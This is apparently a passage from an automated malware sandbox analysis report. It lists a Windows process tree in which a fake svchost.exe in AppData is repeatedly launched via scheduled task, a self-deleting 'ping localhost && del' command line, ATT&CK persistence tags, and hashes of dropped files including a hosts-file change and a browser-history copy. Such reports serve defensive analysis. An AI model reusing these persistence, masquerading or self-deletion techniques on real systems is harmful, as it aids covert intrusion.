C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\iednmj.exe" && pause3⤵
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
-
C:\Windows\system32\taskeng.exetaskeng.exe {90BAF0C2-A960-49BE-9A10-500A906A5ADF} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\ZnsoseXpUGfA3KY\Display\Display.pngFilesize
379KB
MD50269b2440881afc8b8a3356afa6912e4
SHA1ecb66d41f7ac879e741427531a0550273d4cb519
SHA256b823a59e225449e72c92be97050b53bac5083443902a937e541c49a2fb57c8f3
SHA51263bae2d774da23dcce52172de418250bdd4d42d7ea0762a8e575048f77cd2b8773b8ad9f6ed77d9f07e58c652a7a868ed085b9d08f5fcca430a1595bb1a7d2f6
-
C:\Users\Admin\AppData\Local\Temp\dlMx2sVADQZsDIeFilesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\Local\Temp\gyfdsf.exeFilesize
253KB
MD59f3f506175ad4d9550bf1aea609694a7
SHA16cc35e30d5b40eb1b5d115feec12ec247a84193f
SHA2567103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467
SHA512b4a691e3b679dac187f1219cff013d3e27a87d55bf10c4744b8aba969a0caac39922dbbf9bce454b87e3e685f5bfa9043ecabacca090650278ab2d081bc2d5cb
-
C:\Users\Admin\AppData\Local\Temp\places.rawFilesize
5.0MB
MD52ef239599179e7e86cf9b5a52e941597
SHA1fdaea13d732de4776eaf303b51fceb1bbe5f3984
SHA256c5428bb9ef5434800dc7f53b59aed69314e976549fa2672c3808f45a5b3a5a14
SHA5121b01dd689adc5555ef4ac4ece779cd8578af0befb3fb59ed56e3d047b86b39f8b0f1c85639bf025041f630cedaf52306309371473aa16bac85433db49442bd76
-
C:\Users\Admin\AppData\Local\Temp\pr2a2xOi3rP4WQLFilesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
SHA102867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA2564d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
C:\Users\Admin\AppData\Local\Temp\tmpBF03.tmp.datFilesize
92KB
MD5cf00cf5b059b43e29cbde1a36c6209f3
SHA19df2f8ef60997e3934fef0d88f9770fb9d19769f
SHA2569f861e6046979ac19a569747cd17b7e77a8e1301c870691595a68d9a8244a30a
SHA51216e433a67de26cbf052f2639df05c5d3d2c5ef5d4ef065b45af913174e08415bd6672f6637e8727e88b2e68c74c2ffeabc6673e1506e8ad397edb198e0276399
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD58f92f318747327f9b8cefb9e7919b13c
SHA171f8ad4c44b2ef49dc19244d9e15af656dddbf03
SHA256fec9ae15ce6644a9fb5776edf7423b1803a762428cb8c2591bdf38ead8422c0b
SHA512ce473dc287c691e603c606b962ffa9103ebac501915981d88bdeb5232b0fba0a3cb049119f2e8515a870e058ad2dc78c541f7a844d5d7ebd86b01d7991afc7c3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5c82bc064fcf9b0a953cb64a23dc2351d
SHA17723ad4a32be99047ffb8a20866f59da167728ac
SHA2565a760f612cb61e640311f29d7d0e31244fdc4780e33fa5034dbec753362dade9
SHA5127fa116c45767c5f87cac5e05bf075f0ef69d3e9c7bb7db0185871b95d85d433f1484717ecaab035fe9936ad30750dd28e7ab79559531d05ed35be4f4deb3f09a
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
102KB
MD5ce28d82fa8e4dbbd72cae1bf8d4930e1
SHA10cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
SHA256d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
SHA512ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD5577f27e6d74bd8c5b7b0371f2b1e991c
SHA1b334ccfe13792f82b698960cceaee2e690b85528
SHA2560ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/872-289-0x00000000001F0000-0x0000000000210000-memory.dmpFilesize
128KB
-
memory/916-161-0x0000000000EC0000-0x0000000000F06000-memory.dmpFilesize
280KB
-
memory/1120-292-0x0000000000AA0000-0x0000000000AC0000-memory.dmpFilesize
128KB
-
memory/1204-295-0x00000000010E0000-0x0000000001100000-memory.dmpFilesize
128KB
-
memory/1232-251-0x0000000000210000-0x0000000000230000-memory.dmpFilesize
128KB
-
memory/1292-293-0x0000000000F90000-0x0000000000FB0000-memory.dmpFilesize
128KB
-
memory/1408-281-0x00000000010B0000-0x00000000010D0000-memory.dmpFilesize
128KB
-
memory/1672-277-0x00000000010A0000-0x00000000010C0000-memory.dmpFilesize
128KB
-
memory/1712-34-0x0000000000F30000-0x0000000000F50000-memory.dmpFilesize
128KB
-
memory/1740-291-0x0000000000290000-0x00000000002B0000-memory.dmpFilesize
128KB
-
memory/1800-284-0x0000000000190000-0x00000000001B0000-memory.dmpFilesize
128KB
-
memory/1860-294-0x00000000001B0000-0x00000000001D0000-memory.dmpFilesize
128KB
-
memory/1988-286-0x0000000000F70000-0x0000000000F90000-memory.dmpFilesize
128KB
-
memory/2064-299-0x0000000000CB0000-0x0000000000CD0000-memory.dmpFilesize
128KB
-
memory/2208-296-0x00000000012B0000-0x00000000012D0000-memory.dmpFilesize
128KB
-
memory/2256-124-0x0000000002AA0000-0x0000000002AA8000-memory.dmpFilesize
32KB
-
memory/2300-117-0x0000000000B20000-0x0000000000B66000-memory.dmpFilesize
280KB
-
memory/2452-300-0x00000000003A0000-0x00000000003C0000-memory.dmpFilesize
128KB
-
memory/2456-109-0x0000000001290000-0x00000000012B0000-memory.dmpFilesize
128KB
-
memory/2464-279-0x0000000000230000-0x0000000000250000-memory.dmpFilesize
128KB
-
memory/2584-42-0x0000000000A50000-0x0000000000A96000-memory.dmpFilesize
280KB
-
memory/2604-290-0x0000000001220000-0x0000000001240000-memory.dmpFilesize
128KB
-
memory/2612-297-0x0000000000360000-0x0000000000380000-memory.dmpFilesize
128KB
-
memory/2668-298-0x0000000000BA0000-0x0000000000BC0000-memory.dmpFilesize
128KB
-
memory/2724-15-0x0000000002810000-0x0000000002818000-memory.dmpFilesize
32KB
-
memory/2724-14-0x000000001B660000-0x000000001B942000-memory.dmpFilesize
2.9MB
-
memory/2904-208-0x00000000001F0000-0x0000000000236000-memory.dmpFilesize
280KB
-
memory/2912-36-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmpFilesize
9.9MB
-
memory/2912-2-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmpFilesize
9.9MB
-
memory/2912-152-0x000000001C4B0000-0x000000001C560000-memory.dmpFilesize
704KB
-
memory/2912-1-0x0000000001090000-0x00000000010B0000-memory.dmpFilesize
128KB
-
memory/2912-35-0x000007FEF5103000-0x000007FEF5104000-memory.dmpFilesize
4KB
-
memory/2912-82-0x000000001B9C0000-0x000000001BAE0000-memory.dmpFilesize
1.1MB
-
memory/2912-0-0x000007FEF5103000-0x000007FEF5104000-memory.dmpFilesize
4KB
-
memory/2916-7-0x000000001B530000-0x000000001B812000-memory.dmpFilesize
2.9MB
-
memory/2916-8-0x0000000002790000-0x0000000002798000-memory.dmpFilesize
32KB